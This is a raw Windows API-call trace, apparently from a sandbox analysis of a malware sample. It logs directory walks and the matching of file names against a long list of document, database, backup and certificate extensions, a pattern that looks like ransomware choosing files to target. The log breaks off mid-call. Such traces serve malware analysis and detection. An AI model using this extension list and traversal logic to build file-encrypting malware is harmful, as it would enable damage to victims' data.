ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0167.813] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0167.813] FindClose (in: hFindFile=0x801ed8 | out: hFindFile=0x801ed8) returned 1 [0167.813] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0167.813] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1028", cAlternateFileName="")) returned 1 [0167.814] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0167.814] lstrlenW (lpString="C:\\588bce7c90097ed212\\1028") returned 26 [0167.814] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1028\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8021d8 [0167.815] FindNextFileW (in: hFindFile=0x8021d8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.815] FindNextFileW (in: hFindFile=0x8021d8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0167.815] lstrlenW (lpString="eula.rtf") returned 8 [0167.815] lstrlenW (lpString=".1cd") returned 4 [0167.815] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0167.815] lstrlenW (lpString=".3ds") returned 4 [0167.815] lstrcmpiW (lpString1=".3ds", lpString2=".rtf") returned -1 [0167.815] lstrlenW (lpString=".3fr") returned 4 [0167.816] lstrcmpiW (lpString1=".3fr", lpString2=".rtf") returned -1 [0167.816] lstrlenW (lpString=".3g2") returned 4 [0167.816] lstrcmpiW (lpString1=".3g2", lpString2=".rtf") returned -1 [0167.816] lstrlenW (lpString=".3gp") returned 4 [0167.816] lstrcmpiW (lpString1=".3gp", lpString2=".rtf") returned -1 [0167.816] lstrlenW (lpString=".7z") returned 3 [0167.816] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0167.816] lstrlenW (lpString=".accda") returned 6 [0167.816] lstrcmpiW (lpString1=".accda", lpString2="la.rtf") returned -1 [0167.816] lstrlenW (lpString=".accdb") returned 6 [0167.816] lstrcmpiW (lpString1=".accdb", lpString2="la.rtf") returned -1 [0167.816] lstrlenW (lpString=".accdc") returned 6 [0167.816] lstrcmpiW (lpString1=".accdc", lpString2="la.rtf") returned -1 [0167.816] lstrlenW (lpString=".accde") returned 6 [0167.816] lstrcmpiW (lpString1=".accde", lpString2="la.rtf") returned -1 [0167.816] lstrlenW (lpString=".accdt") returned 6 [0167.816] lstrcmpiW (lpString1=".accdt", lpString2="la.rtf") returned -1 [0167.816] lstrlenW (lpString=".accdw") returned 6 [0167.816] lstrcmpiW (lpString1=".accdw", lpString2="la.rtf") returned -1 [0167.816] lstrlenW (lpString=".adb") returned 4 [0167.816] lstrcmpiW (lpString1=".adb", lpString2=".rtf") returned -1 [0167.816] lstrlenW (lpString=".adp") returned 4 [0167.816] lstrcmpiW (lpString1=".adp", lpString2=".rtf") returned -1 [0167.816] lstrlenW (lpString=".ai") returned 3 [0167.816] lstrcmpiW (lpString1=".ai", lpString2="rtf") returned -1 [0167.816] lstrlenW (lpString=".ai3") returned 4 [0167.816] lstrcmpiW (lpString1=".ai3", lpString2=".rtf") returned -1 [0167.816] lstrlenW (lpString=".ai4") returned 4 [0167.816] lstrcmpiW (lpString1=".ai4", lpString2=".rtf") returned -1 [0167.816] lstrlenW (lpString=".ai5") returned 4 [0167.817] lstrcmpiW (lpString1=".ai5", lpString2=".rtf") returned -1 [0167.817] lstrlenW (lpString=".ai6") returned 4 [0167.817] lstrcmpiW (lpString1=".ai6", lpString2=".rtf") returned -1 [0167.817] lstrlenW (lpString=".ai7") returned 4 [0167.817] lstrcmpiW (lpString1=".ai7", lpString2=".rtf") returned -1 [0167.817] lstrlenW (lpString=".ai8") returned 4 [0167.817] lstrcmpiW (lpString1=".ai8", lpString2=".rtf") returned -1 [0167.817] lstrlenW (lpString=".anim") returned 5 [0167.817] lstrcmpiW (lpString1=".anim", lpString2="a.rtf") returned -1 [0167.817] lstrlenW (lpString=".arw") returned 4 [0167.817] lstrcmpiW (lpString1=".arw", lpString2=".rtf") returned -1 [0167.817] lstrlenW (lpString=".as") returned 3 [0167.817] lstrcmpiW (lpString1=".as", lpString2="rtf") returned -1 [0167.817] lstrlenW (lpString=".asa") returned 4 [0167.817] lstrcmpiW (lpString1=".asa", lpString2=".rtf") returned -1 [0167.817] lstrlenW (lpString=".asc") returned 4 [0167.817] lstrcmpiW (lpString1=".asc", lpString2=".rtf") returned -1 [0167.817] lstrlenW (lpString=".ascx") returned 5 [0167.817] lstrcmpiW (lpString1=".ascx", lpString2="a.rtf") returned -1 [0167.817] lstrlenW (lpString=".asm") returned 4 [0167.817] lstrcmpiW (lpString1=".asm", lpString2=".rtf") returned -1 [0167.817] lstrlenW (lpString=".asmx") returned 5 [0167.817] lstrcmpiW (lpString1=".asmx", lpString2="a.rtf") returned -1 [0167.817] lstrlenW (lpString=".asp") returned 4 [0167.817] lstrcmpiW (lpString1=".asp", lpString2=".rtf") returned -1 [0167.817] lstrlenW (lpString=".aspx") returned 5 [0167.817] lstrcmpiW (lpString1=".aspx", lpString2="a.rtf") returned -1 [0167.817] lstrlenW (lpString=".asr") returned 4 [0167.817] lstrcmpiW (lpString1=".asr", lpString2=".rtf") returned -1 [0167.817] lstrlenW (lpString=".asx") returned 4 [0167.817] lstrcmpiW (lpString1=".asx", lpString2=".rtf") returned -1 [0167.817] lstrlenW (lpString=".avi") returned 4 [0167.817] lstrcmpiW (lpString1=".avi", lpString2=".rtf") returned -1 [0167.817] lstrlenW (lpString=".avs") returned 4 [0167.817] lstrcmpiW (lpString1=".avs", lpString2=".rtf") returned -1 [0167.817] lstrlenW (lpString=".backup") returned 7 [0167.818] lstrcmpiW (lpString1=".backup", lpString2="ula.rtf") returned -1 [0167.818] lstrlenW (lpString=".bak") returned 4 [0167.818] lstrcmpiW (lpString1=".bak", lpString2=".rtf") returned -1 [0167.818] lstrlenW (lpString=".bay") returned 4 [0167.818] lstrcmpiW (lpString1=".bay", lpString2=".rtf") returned -1 [0167.818] lstrlenW (lpString=".bd") returned 3 [0167.818] lstrcmpiW (lpString1=".bd", lpString2="rtf") returned -1 [0167.818] lstrlenW (lpString=".bin") returned 4 [0167.818] lstrcmpiW (lpString1=".bin", lpString2=".rtf") returned -1 [0167.818] lstrlenW (lpString=".bmp") returned 4 [0167.818] lstrcmpiW (lpString1=".bmp", lpString2=".rtf") returned -1 [0167.818] lstrlenW (lpString=".bz2") returned 4 [0167.818] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0167.818] lstrlenW (lpString=".c") returned 2 [0167.818] lstrcmpiW (lpString1=".c", lpString2="tf") returned -1 [0167.818] lstrlenW (lpString=".cdr") returned 4 [0167.818] lstrcmpiW (lpString1=".cdr", lpString2=".rtf") returned -1 [0167.818] lstrlenW (lpString=".cer") returned 4 [0167.818] lstrcmpiW (lpString1=".cer", lpString2=".rtf") returned -1 [0167.818] lstrlenW (lpString=".cf") returned 3 [0167.818] lstrcmpiW (lpString1=".cf", lpString2="rtf") returned -1 [0167.818] lstrlenW (lpString=".cfc") returned 4 [0167.818] lstrcmpiW (lpString1=".cfc", lpString2=".rtf") returned -1 [0167.818] lstrlenW (lpString=".cfm") returned 4 [0167.818] lstrcmpiW (lpString1=".cfm", lpString2=".rtf") returned -1 [0167.818] lstrlenW (lpString=".cfml") returned 5 [0167.818] lstrcmpiW (lpString1=".cfml", lpString2="a.rtf") returned -1 [0167.818] lstrlenW (lpString=".cfu") returned 4 [0167.818] lstrcmpiW (lpString1=".cfu", lpString2=".rtf") returned -1 [0167.818] lstrlenW (lpString=".chm") returned 4 [0167.818] lstrcmpiW (lpString1=".chm", lpString2=".rtf") returned -1 [0167.818] lstrlenW (lpString=".cin") returned 4 [0167.818] lstrcmpiW (lpString1=".cin", lpString2=".rtf") returned -1 [0167.818] lstrlenW (lpString=".class") returned 6 [0167.818] lstrcmpiW (lpString1=".class", lpString2="la.rtf") returned -1 [0167.818] lstrlenW (lpString=".clx") returned 4 [0167.818] lstrcmpiW (lpString1=".clx", lpString2=".rtf") returned -1 [0167.819] lstrlenW (lpString=".config") returned 7 [0167.819] lstrcmpiW (lpString1=".config", lpString2="ula.rtf") returned -1 [0167.819] lstrlenW (lpString=".cpp") returned 4 [0167.819] lstrcmpiW (lpString1=".cpp", lpString2=".rtf") returned -1 [0167.819] lstrlenW (lpString=".cr2") returned 4 [0167.819] lstrcmpiW (lpString1=".cr2", lpString2=".rtf") returned -1 [0167.819] lstrlenW (lpString=".crt") returned 4 [0167.819] lstrcmpiW (lpString1=".crt", lpString2=".rtf") returned -1 [0167.819] lstrlenW (lpString=".crw") returned 4 [0167.819] lstrcmpiW (lpString1=".crw", lpString2=".rtf") returned -1 [0167.819] lstrlenW (lpString=".cs") returned 3 [0167.819] lstrcmpiW (lpString1=".cs", lpString2="rtf") returned -1 [0167.819] lstrlenW (lpString=".css") returned 4 [0167.819] lstrcmpiW (lpString1=".css", lpString2=".rtf") returned -1 [0167.819] lstrlenW (lpString=".csv") returned 4 [0167.819] lstrcmpiW (lpString1=".csv", lpString2=".rtf") returned -1 [0167.819] lstrlenW (lpString=".cub") returned 4 [0167.819] lstrcmpiW (lpString1=".cub", lpString2=".rtf") returned -1 [0167.819] lstrlenW (lpString=".dae") returned 4 [0167.819] lstrcmpiW (lpString1=".dae", lpString2=".rtf") returned -1 [0167.819] lstrlenW (lpString=".dat") returned 4 [0167.819] lstrcmpiW (lpString1=".dat", lpString2=".rtf") returned -1 [0167.819] lstrlenW (lpString=".db") returned 3 [0167.819] lstrcmpiW (lpString1=".db", lpString2="rtf") returned -1 [0167.819] lstrlenW (lpString=".dbf") returned 4 [0167.819] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0167.819] lstrlenW (lpString=".dbx") returned 4 [0167.819] lstrcmpiW (lpString1=".dbx", lpString2=".rtf") returned -1 [0167.819] lstrlenW (lpString=".dc3") returned 4 [0167.819] lstrcmpiW (lpString1=".dc3", lpString2=".rtf") returned -1 [0167.819] lstrlenW (lpString=".dcm") returned 4 [0167.819] lstrcmpiW (lpString1=".dcm", lpString2=".rtf") returned -1 [0167.819] lstrlenW (lpString=".dcr") returned 4 [0167.819] lstrcmpiW (lpString1=".dcr", lpString2=".rtf") returned -1 [0167.819] lstrlenW (lpString=".der") returned 4 [0167.820] lstrcmpiW (lpString1=".der", lpString2=".rtf") returned -1 [0167.820] lstrlenW (lpString=".dib") returned 4 [0167.820] lstrcmpiW (lpString1=".dib", lpString2=".rtf") returned -1 [0167.820] lstrlenW (lpString=".dic") returned 4 [0167.820] lstrcmpiW (lpString1=".dic", lpString2=".rtf") returned -1 [0167.820] lstrlenW (lpString=".dif") returned 4 [0167.820] lstrcmpiW (lpString1=".dif", lpString2=".rtf") returned -1 [0167.820] lstrlenW (lpString=".divx") returned 5 [0167.820] lstrcmpiW (lpString1=".divx", lpString2="a.rtf") returned -1 [0167.820] lstrlenW (lpString=".djvu") returned 5 [0167.820] lstrcmpiW (lpString1=".djvu", lpString2="a.rtf") returned -1 [0167.820] lstrlenW (lpString=".dng") returned 4 [0167.820] lstrcmpiW (lpString1=".dng", lpString2=".rtf") returned -1 [0167.820] lstrlenW (lpString=".doc") returned 4 [0167.820] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0167.820] lstrlenW (lpString=".docm") returned 5 [0167.820] lstrcmpiW (lpString1=".docm", lpString2="a.rtf") returned -1 [0167.820] lstrlenW (lpString=".docx") returned 5 [0167.820] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0167.820] lstrlenW (lpString=".dot") returned 4 [0167.820] lstrcmpiW (lpString1=".dot", lpString2=".rtf") returned -1 [0167.820] lstrlenW (lpString=".dotm") returned 5 [0167.820] lstrcmpiW (lpString1=".dotm", lpString2="a.rtf") returned -1 [0167.820] lstrlenW (lpString=".dotx") returned 5 [0167.820] lstrcmpiW (lpString1=".dotx", lpString2="a.rtf") returned -1 [0167.820] lstrlenW (lpString=".dpx") returned 4 [0167.820] lstrcmpiW (lpString1=".dpx", lpString2=".rtf") returned -1 [0167.820] lstrlenW (lpString=".dqy") returned 4 [0167.820] lstrcmpiW (lpString1=".dqy", lpString2=".rtf") returned -1 [0167.820] lstrlenW (lpString=".dsn") returned 4 [0167.820] lstrcmpiW (lpString1=".dsn", lpString2=".rtf") returned -1 [0167.820] lstrlenW (lpString=".dt") returned 3 [0167.820] lstrcmpiW (lpString1=".dt", lpString2="rtf") returned -1 [0167.820] lstrlenW (lpString=".dtd") returned 4 [0167.820] lstrcmpiW (lpString1=".dtd", lpString2=".rtf") returned -1 [0167.820] lstrlenW (lpString=".dwg") returned 4 [0167.821] lstrcmpiW (lpString1=".dwg", lpString2=".rtf") returned -1 [0167.821] lstrlenW (lpString=".dwt") returned 4 [0167.821] lstrcmpiW (lpString1=".dwt", lpString2=".rtf") returned -1 [0167.821] lstrlenW (lpString=".dx") returned 3 [0167.821] lstrcmpiW (lpString1=".dx", lpString2="rtf") returned -1 [0167.821] lstrlenW (lpString=".dxf") returned 4 [0167.821] lstrcmpiW (lpString1=".dxf", lpString2=".rtf") returned -1 [0167.821] lstrlenW (lpString=".edml") returned 5 [0167.821] lstrcmpiW (lpString1=".edml", lpString2="a.rtf") returned -1 [0167.821] lstrlenW (lpString=".efd") returned 4 [0167.821] lstrcmpiW (lpString1=".efd", lpString2=".rtf") returned -1 [0167.821] lstrlenW (lpString=".elf") returned 4 [0167.821] lstrcmpiW (lpString1=".elf", lpString2=".rtf") returned -1 [0167.821] lstrlenW (lpString=".emf") returned 4 [0167.821] lstrcmpiW (lpString1=".emf", lpString2=".rtf") returned -1 [0167.821] lstrlenW (lpString=".emz") returned 4 [0167.821] lstrcmpiW (lpString1=".emz", lpString2=".rtf") returned -1 [0167.821] lstrlenW (lpString=".epf") returned 4 [0167.821] lstrcmpiW (lpString1=".epf", lpString2=".rtf") returned -1 [0167.821] lstrlenW (lpString=".eps") returned 4 [0167.821] lstrcmpiW (lpString1=".eps", lpString2=".rtf") returned -1 [0167.821] lstrlenW (lpString=".epsf") returned 5 [0167.821] lstrcmpiW (lpString1=".epsf", lpString2="a.rtf") returned -1 [0167.821] lstrlenW (lpString=".epsp") returned 5 [0167.821] lstrcmpiW (lpString1=".epsp", lpString2="a.rtf") returned -1 [0167.821] lstrlenW (lpString=".erf") returned 4 [0167.821] lstrcmpiW (lpString1=".erf", lpString2=".rtf") returned -1 [0167.821] lstrlenW (lpString=".exr") returned 4 [0167.821] lstrcmpiW (lpString1=".exr", lpString2=".rtf") returned -1 [0167.821] lstrlenW (lpString=".f4v") returned 4 [0167.821] lstrcmpiW (lpString1=".f4v", lpString2=".rtf") returned -1 [0167.821] lstrlenW (lpString=".fido") returned 5 [0167.821] lstrcmpiW (lpString1=".fido", lpString2="a.rtf") returned -1 [0167.821] lstrlenW (lpString=".flm") returned 4 [0167.821] lstrcmpiW (lpString1=".flm", lpString2=".rtf") returned -1 [0167.822] lstrlenW (lpString=".flv") returned 4 [0167.822] lstrcmpiW (lpString1=".flv", lpString2=".rtf") returned -1 [0167.822] lstrlenW (lpString=".frm") returned 4 [0167.822] lstrcmpiW (lpString1=".frm", lpString2=".rtf") returned -1 [0167.822] lstrlenW (lpString=".fxg") returned 4 [0167.822] lstrcmpiW (lpString1=".fxg", lpString2=".rtf") returned -1 [0167.822] lstrlenW (lpString=".geo") returned 4 [0167.822] lstrcmpiW (lpString1=".geo", lpString2=".rtf") returned -1 [0167.822] lstrlenW (lpString=".gif") returned 4 [0167.822] lstrcmpiW (lpString1=".gif", lpString2=".rtf") returned -1 [0167.822] lstrlenW (lpString=".grs") returned 4 [0167.822] lstrcmpiW (lpString1=".grs", lpString2=".rtf") returned -1 [0167.822] lstrlenW (lpString=".gz") returned 3 [0167.822] lstrcmpiW (lpString1=".gz", lpString2="rtf") returned -1 [0167.822] lstrlenW (lpString=".h") returned 2 [0167.822] lstrcmpiW (lpString1=".h", lpString2="tf") returned -1 [0167.822] lstrlenW (lpString=".hdr") returned 4 [0167.822] lstrcmpiW (lpString1=".hdr", lpString2=".rtf") returned -1 [0167.822] lstrlenW (lpString=".hpp") returned 4 [0167.822] lstrcmpiW (lpString1=".hpp", lpString2=".rtf") returned -1 [0167.822] lstrlenW (lpString=".hta") returned 4 [0167.822] lstrcmpiW (lpString1=".hta", lpString2=".rtf") returned -1 [0167.822] lstrlenW (lpString=".htc") returned 4 [0167.822] lstrcmpiW (lpString1=".htc", lpString2=".rtf") returned -1 [0167.822] lstrlenW (lpString=".htm") returned 4 [0167.822] lstrcmpiW (lpString1=".htm", lpString2=".rtf") returned -1 [0167.822] lstrlenW (lpString=".html") returned 5 [0167.822] lstrcmpiW (lpString1=".html", lpString2="a.rtf") returned -1 [0167.822] lstrlenW (lpString=".icb") returned 4 [0167.822] lstrcmpiW (lpString1=".icb", lpString2=".rtf") returned -1 [0167.822] lstrlenW (lpString=".ics") returned 4 [0167.822] lstrcmpiW (lpString1=".ics", lpString2=".rtf") returned -1 [0167.822] lstrlenW (lpString=".iff") returned 4 [0167.823] lstrcmpiW (lpString1=".iff", lpString2=".rtf") returned -1 [0167.823] lstrlenW (lpString=".inc") returned 4 [0167.823] lstrcmpiW (lpString1=".inc", lpString2=".rtf") returned -1 [0167.823] lstrlenW (lpString=".indd") returned 5 [0167.823] lstrcmpiW (lpString1=".indd", lpString2="a.rtf") returned -1 [0167.823] lstrlenW (lpString=".ini") returned 4 [0167.823] lstrcmpiW (lpString1=".ini", lpString2=".rtf") returned -1 [0167.823] lstrlenW (lpString=".iqy") returned 4 [0167.823] lstrcmpiW (lpString1=".iqy", lpString2=".rtf") returned -1 [0167.823] lstrlenW (lpString=".j2c") returned 4 [0167.823] lstrcmpiW (lpString1=".j2c", lpString2=".rtf") returned -1 [0167.823] lstrlenW (lpString=".j2k") returned 4 [0167.823] lstrcmpiW (lpString1=".j2k", lpString2=".rtf") returned -1 [0167.823] lstrlenW (lpString=".java") returned 5 [0167.823] lstrcmpiW (lpString1=".java", lpString2="a.rtf") returned -1 [0167.823] lstrlenW (lpString=".jp2") returned 4 [0167.823] lstrcmpiW (lpString1=".jp2", lpString2=".rtf") returned -1 [0167.823] lstrlenW (lpString=".jpc") returned 4 [0167.823] lstrcmpiW (lpString1=".jpc", lpString2=".rtf") returned -1 [0167.823] lstrlenW (lpString=".jpe") returned 4 [0167.823] lstrcmpiW (lpString1=".jpe", lpString2=".rtf") returned -1 [0167.823] lstrlenW (lpString=".jpeg") returned 5 [0167.823] lstrcmpiW (lpString1=".jpeg", lpString2="a.rtf") returned -1 [0167.823] lstrlenW (lpString=".jpf") returned 4 [0167.823] lstrcmpiW (lpString1=".jpf", lpString2=".rtf") returned -1 [0167.823] lstrlenW (lpString=".jpg") returned 4 [0167.823] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0167.823] lstrlenW (lpString=".jpx") returned 4 [0167.823] lstrcmpiW (lpString1=".jpx", lpString2=".rtf") returned -1 [0167.823] lstrlenW (lpString=".js") returned 3 [0167.823] lstrcmpiW (lpString1=".js", lpString2="rtf") returned -1 [0167.823] lstrlenW (lpString=".jsf") returned 4 [0167.823] lstrcmpiW (lpString1=".jsf", lpString2=".rtf") returned -1 [0167.823] lstrlenW (lpString=".json") returned 5 [0167.823] lstrcmpiW (lpString1=".json", lpString2="a.rtf") returned -1 [0167.823] lstrlenW (lpString=".jsp") returned 4 [0167.824] lstrcmpiW (lpString1=".jsp", lpString2=".rtf") returned -1 [0167.824] lstrlenW (lpString=".kdc") returned 4 [0167.824] lstrcmpiW (lpString1=".kdc", lpString2=".rtf") returned -1 [0167.824] lstrlenW (lpString=".kmz") returned 4 [0167.824] lstrcmpiW (lpString1=".kmz", lpString2=".rtf") returned -1 [0167.824] lstrlenW (lpString=".kwm") returned 4 [0167.824] lstrcmpiW (lpString1=".kwm", lpString2=".rtf") returned -1 [0167.824] lstrlenW (lpString=".lasso") returned 6 [0167.824] lstrcmpiW (lpString1=".lasso", lpString2="la.rtf") returned -1 [0167.824] lstrlenW (lpString=".lbi") returned 4 [0167.824] lstrcmpiW (lpString1=".lbi", lpString2=".rtf") returned -1 [0167.824] lstrlenW (lpString=".lgf") returned 4 [0167.824] lstrcmpiW (lpString1=".lgf", lpString2=".rtf") returned -1 [0167.824] lstrlenW (lpString=".lgp") returned 4 [0167.824] lstrcmpiW (lpString1=".lgp", lpString2=".rtf") returned -1 [0167.824] lstrlenW (lpString=".log") returned 4 [0167.824] lstrcmpiW (lpString1=".log", lpString2=".rtf") returned -1 [0167.824] lstrlenW (lpString=".m1v") returned 4 [0167.824] lstrcmpiW (lpString1=".m1v", lpString2=".rtf") returned -1 [0167.824] lstrlenW (lpString=".m4a") returned 4 [0167.824] lstrcmpiW (lpString1=".m4a", lpString2=".rtf") returned -1 [0167.824] lstrlenW (lpString=".m4v") returned 4 [0167.824] lstrcmpiW (lpString1=".m4v", lpString2=".rtf") returned -1 [0167.824] lstrlenW (lpString=".max") returned 4 [0167.824] lstrcmpiW (lpString1=".max", lpString2=".rtf") returned -1 [0167.824] lstrlenW (lpString=".md") returned 3 [0167.824] lstrcmpiW (lpString1=".md", lpString2="rtf") returned -1 [0167.824] lstrlenW (lpString=".mda") returned 4 [0167.824] lstrcmpiW (lpString1=".mda", lpString2=".rtf") returned -1 [0167.824] lstrlenW (lpString=".mdb") returned 4 [0167.824] lstrcmpiW (lpString1=".mdb", lpString2=".rtf") returned -1 [0167.824] lstrlenW (lpString=".mde") returned 4 [0167.824] lstrcmpiW (lpString1=".mde", lpString2=".rtf") returned -1 [0167.824] lstrlenW (lpString=".mdf") returned 4 [0167.824] lstrcmpiW (lpString1=".mdf", lpString2=".rtf") returned -1 [0167.824] lstrlenW (lpString=".mdw") returned 4 [0167.825] lstrcmpiW (lpString1=".mdw", lpString2=".rtf") returned -1 [0167.825] lstrlenW (lpString=".mef") returned 4 [0167.825] lstrcmpiW (lpString1=".mef", lpString2=".rtf") returned -1 [0167.825] lstrlenW (lpString=".mft") returned 4 [0167.825] lstrcmpiW (lpString1=".mft", lpString2=".rtf") returned -1 [0167.825] lstrlenW (lpString=".mfw") returned 4 [0167.825] lstrcmpiW (lpString1=".mfw", lpString2=".rtf") returned -1 [0167.825] lstrlenW (lpString=".mht") returned 4 [0167.825] lstrcmpiW (lpString1=".mht", lpString2=".rtf") returned -1 [0167.825] lstrlenW (lpString=".mhtml") returned 6 [0167.825] lstrcmpiW (lpString1=".mhtml", lpString2="la.rtf") returned -1 [0167.825] lstrlenW (lpString=".mka") returned 4 [0167.825] lstrcmpiW (lpString1=".mka", lpString2=".rtf") returned -1 [0167.825] lstrlenW (lpString=".mkidx") returned 6 [0167.825] lstrcmpiW (lpString1=".mkidx", lpString2="la.rtf") returned -1 [0167.825] lstrlenW (lpString=".mkv") returned 4 [0167.825] lstrcmpiW (lpString1=".mkv", lpString2=".rtf") returned -1 [0167.825] lstrlenW (lpString=".mos") returned 4 [0167.825] lstrcmpiW (lpString1=".mos", lpString2=".rtf") returned -1 [0167.825] lstrlenW (lpString=".mov") returned 4 [0167.825] lstrcmpiW (lpString1=".mov", lpString2=".rtf") returned -1 [0167.825] lstrlenW (lpString=".mp3") returned 4 [0167.825] lstrcmpiW (lpString1=".mp3", lpString2=".rtf") returned -1 [0167.825] lstrlenW (lpString=".mp4") returned 4 [0167.825] lstrcmpiW (lpString1=".mp4", lpString2=".rtf") returned -1 [0167.825] lstrlenW (lpString=".mpeg") returned 5 [0167.825] lstrcmpiW (lpString1=".mpeg", lpString2="a.rtf") returned -1 [0167.825] lstrlenW (lpString=".mpg") returned 4 [0167.825] lstrcmpiW (lpString1=".mpg", lpString2=".rtf") returned -1 [0167.825] lstrlenW (lpString=".mpv") returned 4 [0167.825] lstrcmpiW (lpString1=".mpv", lpString2=".rtf") returned -1 [0167.825] lstrlenW (lpString=".mrw") returned 4 [0167.825] lstrcmpiW (lpString1=".mrw", lpString2=".rtf") returned -1 [0167.825] lstrlenW (lpString=".msg") returned 4 [0167.825] lstrcmpiW (lpString1=".msg", lpString2=".rtf") returned -1 [0167.825] lstrlenW (lpString=".mxl") returned 4 [0167.825] lstrcmpiW (lpString1=".mxl", lpString2=".rtf") returned -1 [0167.826] lstrlenW (lpString=".myd") returned 4 [0167.826] lstrcmpiW (lpString1=".myd", lpString2=".rtf") returned -1 [0167.826] lstrlenW (lpString=".myi") returned 4 [0167.826] lstrcmpiW (lpString1=".myi", lpString2=".rtf") returned -1 [0167.826] lstrlenW (lpString=".nef") returned 4 [0167.826] lstrcmpiW (lpString1=".nef", lpString2=".rtf") returned -1 [0167.826] lstrlenW (lpString=".nrw") returned 4 [0167.826] lstrcmpiW (lpString1=".nrw", lpString2=".rtf") returned -1 [0167.826] lstrlenW (lpString=".obj") returned 4 [0167.826] lstrcmpiW (lpString1=".obj", lpString2=".rtf") returned -1 [0167.826] lstrlenW (lpString=".odb") returned 4 [0167.826] lstrcmpiW (lpString1=".odb", lpString2=".rtf") returned -1 [0167.826] lstrlenW (lpString=".odc") returned 4 [0167.826] lstrcmpiW (lpString1=".odc", lpString2=".rtf") returned -1 [0167.826] lstrlenW (lpString=".odm") returned 4 [0167.826] lstrcmpiW (lpString1=".odm", lpString2=".rtf") returned -1 [0167.826] lstrlenW (lpString=".odp") returned 4 [0167.826] lstrcmpiW (lpString1=".odp", lpString2=".rtf") returned -1 [0167.826] lstrlenW (lpString=".ods") returned 4 [0167.826] lstrcmpiW (lpString1=".ods", lpString2=".rtf") returned -1 [0167.826] lstrlenW (lpString=".oft") returned 4 [0167.826] lstrcmpiW (lpString1=".oft", lpString2=".rtf") returned -1 [0167.826] lstrlenW (lpString=".one") returned 4 [0167.826] lstrcmpiW (lpString1=".one", lpString2=".rtf") returned -1 [0167.826] lstrlenW (lpString=".onepkg") returned 7 [0167.826] lstrcmpiW (lpString1=".onepkg", lpString2="ula.rtf") returned -1 [0167.826] lstrlenW (lpString=".onetoc2") returned 8 [0167.826] lstrcmpiW (lpString1=".onetoc2", lpString2="eula.rtf") returned -1 [0167.826] lstrlenW (lpString=".opt") returned 4 [0167.826] lstrcmpiW (lpString1=".opt", lpString2=".rtf") returned -1 [0167.826] lstrlenW (lpString=".oqy") returned 4 [0167.826] lstrcmpiW (lpString1=".oqy", lpString2=".rtf") returned -1 [0167.826] lstrlenW (lpString=".orf") returned 4 [0167.826] lstrcmpiW (lpString1=".orf", lpString2=".rtf") returned -1 [0167.826] lstrlenW (lpString=".p12") returned 4 [0167.827] lstrcmpiW (lpString1=".p12", lpString2=".rtf") returned -1 [0167.827] lstrlenW 